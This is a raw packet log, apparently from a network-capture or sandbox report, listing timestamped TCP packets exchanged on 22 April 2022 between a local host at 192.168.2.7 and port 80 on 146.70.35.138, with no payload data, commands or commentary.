Apr 22, 2022 15:27:19.051151037 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.051183939 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.091965914 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.092150927 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.094906092 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.094975948 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095000982 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095021009 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095038891 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095058918 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095084906 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095102072 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095119953 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095135927 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.095144987 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095170021 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095186949 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095190048 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.095211029 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095220089 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.095231056 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.095271111 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133063078 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133119106 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133138895 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133164883 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133191109 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133207083 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133232117 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133256912 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133274078 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133292913 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133294106 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133317947 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133353949 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133359909 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133361101 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133373022 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133399963 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133399963 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133415937 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133430958 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133492947 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133517981 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133519888 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133536100 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133555889 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133560896 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.133583069 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.133604050 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174278975 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174324989 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174345016 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174386024 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174391985 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174397945 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174422026 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174431086 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174447060 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174463034 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174480915 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174508095 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174540997 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174619913 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174645901 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174664974 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174673080 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174710035 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174730062 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174740076 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174756050 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174781084 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174798012 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174804926 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174823046 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174835920 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174859047 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.174880028 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.174916029 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.175111055 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.175142050 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.175158978 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.175165892 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.175188065 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.175246954 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.175266981 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.175293922 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.175318956 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215569973 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215630054 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215651035 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215662003 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215676069 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215689898 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215701103 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215715885 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215719938 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215744019 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215744019 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215764999 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215780020 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215786934 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215796947 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215806961 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215841055 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215872049 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215897083 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215914011 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215917110 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215939045 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215944052 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.215964079 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215981007 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.215981960 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.216005087 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.216054916 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.216079950 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.216097116 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.216104984 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.216120958 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.216212034 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.216258049 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.256669044 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256676912 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256680965 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256704092 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256732941 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256750107 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256772995 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.256777048 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256799936 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256814957 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256840944 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.256870985 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.256875038 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.256937981 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257031918 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257055998 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257072926 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257090092 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257093906 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257122993 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257147074 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257152081 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257169008 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257198095 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257216930 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257257938 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257265091 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257278919 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257306099 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.257328033 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.257389069 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.298845053 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.298898935 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.298918009 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.298940897 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.298947096 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.298965931 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.298976898 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.298981905 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299001932 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299022913 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299027920 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299045086 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299098015 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299114943 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299139023 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299154997 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299166918 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299206972 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299283981 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299309015 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299324989 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299335003 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299357891 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299360037 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299401045 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299406052 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299417973 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299434900 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299443007 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299480915 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299699068 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299734116 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299751043 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299767971 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299803019 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299882889 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299901962 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.299933910 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.299954891 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340186119 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340233088 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340250969 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340270996 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340282917 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340292931 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340308905 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340329885 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340368032 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340404034 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340426922 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340442896 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340454102 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340461016 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340475082 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340502024 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340759039 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340795040 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340821981 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340852976 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340874910 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340910912 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340935946 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340951920 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.340964079 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.340986013 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.341007948 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341016054 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341036081 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341064930 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.341125011 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341173887 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.341259956 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341293097 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341310024 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341327906 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.341334105 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341356039 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.341375113 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.341430902 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.380314112 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.380369902 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.380392075 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.380415916 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.380433083 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.380435944 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.380480051 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.380547047 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.381736994 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.381786108 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.381803036 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.381824017 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.381848097 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.381864071 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.381886959 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.381911993 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.381927013 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.381948948 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.381968021 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.381975889 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.382019997 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.382097960 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.382127047 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.382143974 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.382183075 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.382193089 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.382251024 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.382278919 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.382294893 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.382308006 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.382339001 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.382457972 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.382484913 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.382502079 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.382517099 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.382850885 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.382863998 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.421799898 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.421817064 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.421848059 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.421873093 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.421891928 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
Apr 22, 2022 15:27:19.422003984 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.422054052 CEST | 49775 | 80 | 192.168.2.7 | 146.70.35.138 |
Apr 22, 2022 15:27:19.423046112 CEST | 80 | 49775 | 146.70.35.138 | 192.168.2.7 |
